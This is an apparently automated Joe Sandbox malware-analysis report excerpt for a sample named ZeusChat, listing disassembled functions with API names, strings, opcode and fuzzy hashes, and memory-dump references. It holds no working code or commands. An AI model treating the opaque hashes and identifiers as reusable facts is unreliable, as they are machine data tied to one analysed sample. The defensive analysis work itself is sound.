                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _set_statfp
                                                                                                      • String ID: !$asin
                                                                                                      • API String ID: 1156100317-2188059690
                                                                                                      • Opcode ID: 41486beb716a1d3ce37726eba78a07ae1a3876e53f623111aae521f8a9e85d9d
                                                                                                      • Instruction ID: f960023c4313fa2e9e8e40d372fb7e062b03ab1534167d1aefad94c64aa867c5
                                                                                                      • Opcode Fuzzy Hash: 41486beb716a1d3ce37726eba78a07ae1a3876e53f623111aae521f8a9e85d9d
                                                                                                      • Instruction Fuzzy Hash: 7E61E422C2DF8589E2639B385C1137AD364BFB63D0F958332E95E35A65DF6CE086C610
                                                                                                      Function 00007FF75207AD28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Delete$InfoItem
                                                                                                      • String ID: P
                                                                                                      • API String ID: 135850232-3110715001
                                                                                                      • Opcode ID: f62664e60d2089e058bbf88f82fa64fb9d6e9027cc1cc1a0f268c82638e958f5
                                                                                                      • Instruction ID: 72207feaa6320f156ebda51d935ffe0c743231a470ae84eb2a80c0f1e8b982b6
                                                                                                      • Opcode Fuzzy Hash: f62664e60d2089e058bbf88f82fa64fb9d6e9027cc1cc1a0f268c82638e958f5
                                                                                                      • Instruction Fuzzy Hash: 32419332A0569185EB60FB15C8047BDA761FB84BA0F9D8231EA6D077D1DF7DD849C720
                                                                                                      Function 00007FF75203E938 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                      • String ID: U
                                                                                                      • API String ID: 2456169464-4171548499
                                                                                                      • Opcode ID: f09a28fcae5188001d86cef28677a7ab9bc0fda8486cb330b6ca1d514bdcb2ce
                                                                                                      • Instruction ID: d3c3125b67ee13db6c71d79d0904c62cec6264a4e6e014a6ac7001e85415174a
                                                                                                      • Opcode Fuzzy Hash: f09a28fcae5188001d86cef28677a7ab9bc0fda8486cb330b6ca1d514bdcb2ce
                                                                                                      • Instruction Fuzzy Hash: F741C522B1EA4582D760EF25E8443B9B7A0FB98B94F884131EE4D87794DFBCE449C750
                                                                                                      Function 00007FF7520ABCCC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Long
                                                                                                      • String ID: SysTreeView32
                                                                                                      • API String ID: 847901565-1698111956
                                                                                                      • Opcode ID: 7bb5fa9822eba039514a9ba19c73050aeebd4584b22656b65eef0b423cabdd65
                                                                                                      • Instruction ID: f5d6eb37b6daa8896788b839f2a8a083f024ea1ad992978ce780d38e5b7bffad
                                                                                                      • Opcode Fuzzy Hash: 7bb5fa9822eba039514a9ba19c73050aeebd4584b22656b65eef0b423cabdd65
                                                                                                      • Instruction Fuzzy Hash: CE415032A0A7C186E770EB14E844B9AB7A1F784764F544335DAAC03B99CF7CD849CB50
                                                                                                      Function 00007FF7520AB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$CreateObjectStock
                                                                                                      • String ID: SysMonthCal32
                                                                                                      • API String ID: 2671490118-1439706946
                                                                                                      • Opcode ID: 25626af29ff67ce8d6fd7c70d4133758a87d5dadaddcd57ce23f9999b42ad6ab
                                                                                                      • Instruction ID: 8b0240ff7f3f6082b9653daf8dd5e7dab99800c0f76884524d5abb6157b67e57
                                                                                                      • Opcode Fuzzy Hash: 25626af29ff67ce8d6fd7c70d4133758a87d5dadaddcd57ce23f9999b42ad6ab
                                                                                                      • Instruction Fuzzy Hash: 6F416D326096C28AE370DF25E444B9AB7A1F788790F944235EA9D03A99DF7CD485CF50
                                                                                                      Function 00007FF7520AC010 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                                                                      • String ID: msctls_updown32
                                                                                                      • API String ID: 1752125012-2298589950
                                                                                                      • Opcode ID: 428f94a7a59cd7bf989baa6ef0aa5c6b519b04ddf6fb8b4790f89f2c0ee1e6c4
                                                                                                      • Instruction ID: 806a50b86951797acf8fa4f8c79769a03216ca96afdd8708bd4d34ce9a62317e
                                                                                                      • Opcode Fuzzy Hash: 428f94a7a59cd7bf989baa6ef0aa5c6b519b04ddf6fb8b4790f89f2c0ee1e6c4
                                                                                                      • Instruction Fuzzy Hash: A5317E76A19B8186EB60DB15E8803AAB361FB95B91F988135DA8D03B58CF7CD449CB10
                                                                                                      Function 00007FF7520AAA64 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$CreateMoveObjectStock
                                                                                                      • String ID: Listbox
                                                                                                      • API String ID: 3747482310-2633736733
                                                                                                      • Opcode ID: 2d3583662e6f7e144ee14d910da68979ea0603b7228fe14a50fd2d5f2b3179cb
                                                                                                      • Instruction ID: 7aaff748cfc660c46783472bfd849727d64a2bb3a8adbae74771fc3043c54541
                                                                                                      • Opcode Fuzzy Hash: 2d3583662e6f7e144ee14d910da68979ea0603b7228fe14a50fd2d5f2b3179cb
                                                                                                      • Instruction Fuzzy Hash: 01317C366197C186E370DF15B844B5AB7A1F7887A0F944225EAAD03B98CB7DD885CF10
                                                                                                      Function 00007FF7520046E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetOpenFileNameW.COMDLG32 ref: 00007FF75204B0D8
                                                                                                        • Part of subcall function 00007FF752005A50: GetFullPathNameW.KERNEL32(?,00007FF752005A3D,?,00007FF752004C50,?,?,?,00007FF75200109E), ref: 00007FF752005A7B
                                                                                                        • Part of subcall function 00007FF752004694: GetLongPathNameW.KERNEL32(?,00007FF752004741,?,00007FF752003C00,?,?,?,?,?,00007FF752002BC1), ref: 00007FF7520046B8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                                                      • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                                                      • API String ID: 779396738-2360590182
                                                                                                      • Opcode ID: 16a998d4ffd8908b2b5846d7a7af52c857f6656f6899eb4e8e8eaa093dec734f
                                                                                                      • Instruction ID: 9e95664ccf6ced0d0b73fdb4214609ef74c5b977568498b8b56de95d4fd6dfa5
                                                                                                      • Opcode Fuzzy Hash: 16a998d4ffd8908b2b5846d7a7af52c857f6656f6899eb4e8e8eaa093dec734f
                                                                                                      • Instruction Fuzzy Hash: A4314D72A09B8289E750EF21D8401ADBBA8FB49B84FD88135DA8C43B55DFBCD549C720
                                                                                                      Function 00007FF7520AB97C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                      • String ID: msctls_trackbar32
                                                                                                      • API String ID: 1025951953-1010561917
                                                                                                      • Opcode ID: 0ec90dd8264e47930b8add246dd2117d3f761b03aba2c3bb1ed4f7e4c6c127fa
                                                                                                      • Instruction ID: 1734444bada2ea9a8b4ce75b781f8499b284a16ae959b560a2e0e3ed5ae9d690
                                                                                                      • Opcode Fuzzy Hash: 0ec90dd8264e47930b8add246dd2117d3f761b03aba2c3bb1ed4f7e4c6c127fa
                                                                                                      • Instruction Fuzzy Hash: 8E312736A096818AE3B09F15A844B5AB7A1F798B90F584235DA9D03B58CF78D845CB14
                                                                                                      Function 00007FF752028612 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2280078643-1018135373
                                                                                                      • Opcode ID: f6c1382f695be2b80eeb360de390ec25b85b68791ec0bc773e7ce0cc61abff03
                                                                                                      • Instruction ID: 638aa392785d634076b31794e1b04aaa67b4a41cc0776dc7525e00e44ca90bc0
                                                                                                      • Opcode Fuzzy Hash: f6c1382f695be2b80eeb360de390ec25b85b68791ec0bc773e7ce0cc61abff03
                                                                                                      • Instruction Fuzzy Hash: 97213E3A60964586E770EF11E44426EB760F784B65F484237DE9D03B95CF7EE88ACB20
                                                                                                      Function 00007FF752025A40 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF752025AC3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                      • API String ID: 389471666-631824599
                                                                                                      • Opcode ID: 8c783dfea8ab590eafe6bbf95db9fdce1a8e48e032f2d75969754b32e98ee1d6
                                                                                                      • Instruction ID: 9659c09222457eec23970224674dc76a7d433900575c98c66c8a80032e2dc257
                                                                                                      • Opcode Fuzzy Hash: 8c783dfea8ab590eafe6bbf95db9fdce1a8e48e032f2d75969754b32e98ee1d6
                                                                                                      • Instruction Fuzzy Hash: C0118F32A16B4293E754AB22DE913B973A5FB04345F884135C64D42A50EFBDE46CC720
                                                                                                      Function 00007FF7520071C4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                      • API String ID: 2574300362-1355242751
                                                                                                      • Opcode ID: 935ee8e5b0afee5f2a3e8b61c9fff60d84134b50b40d875a31bd5a84aed26f6b
                                                                                                      • Instruction ID: ba3813de599d9860676cec7892a8460712f322ee1e53487c7a9b921407084578
                                                                                                      • Opcode Fuzzy Hash: 935ee8e5b0afee5f2a3e8b61c9fff60d84134b50b40d875a31bd5a84aed26f6b
                                                                                                      • Instruction Fuzzy Hash: 36E07D25A07B0681EF65AB55E85837863A0FB18B54FC80435C95D45394EFFCDAA9C350
                                                                                                      Function 00007FF75200720C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                      • API String ID: 2574300362-3689287502
                                                                                                      • Opcode ID: 849496fe8f7c3fa53244a860dec0166c597485a1e7ca8ffba036c0d989768c29
                                                                                                      • Instruction ID: 80d0d3ef2b622be03ff046bf7e6aa3857219d2effcf3bbeab6a8dc60d4bbe9a7
                                                                                                      • Opcode Fuzzy Hash: 849496fe8f7c3fa53244a860dec0166c597485a1e7ca8ffba036c0d989768c29
                                                                                                      • Instruction Fuzzy Hash: 65E0ED21907B0A82EF65AB21E85837863E0FB08B44FC80434C95D45354EFFCD6A9C350
                                                                                                      Function 00007FF7520738DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                      • API String ID: 2574300362-192647395
                                                                                                      • Opcode ID: b441bd5978eb2b7f425b1bf27e1c65cb3c7479a7c4568158e328b2615627030f
                                                                                                      • Instruction ID: 15eb8f177d317bee9608cb4729e82b62c66fc8c54bf930d2bf9b0947ae07a5fb
                                                                                                      • Opcode Fuzzy Hash: b441bd5978eb2b7f425b1bf27e1c65cb3c7479a7c4568158e328b2615627030f
                                                                                                      • Instruction Fuzzy Hash: CEE0ED65907B0681EF29AB14E894378A3A0FB08B44FCC0474C91D55354EFFCD6ADC350
                                                                                                      Function 00007FF75206BDC8 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8ea6f4ac70786459caae908e23c7b1e170f2c83987f10f6455c2ac2cf614949c
                                                                                                      • Instruction ID: cf2a53d4dd80fcf5f91a42e173ed6e37a9ffa0d2d45ba4d3e62159f015f3bdea
                                                                                                      • Opcode Fuzzy Hash: 8ea6f4ac70786459caae908e23c7b1e170f2c83987f10f6455c2ac2cf614949c
                                                                                                      • Instruction Fuzzy Hash: B2D14667B05A9686EB14AF26C8442AC77B0FB88F98B554422DF0E57B54CF79E848C324
                                                                                                      Function 00007FF752098334 Relevance: 6.3, APIs: 4, Instructions: 282COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fc57336e55be4d4a0414789caafff31700b7c62f52e3843f0ecb10163a0943b0
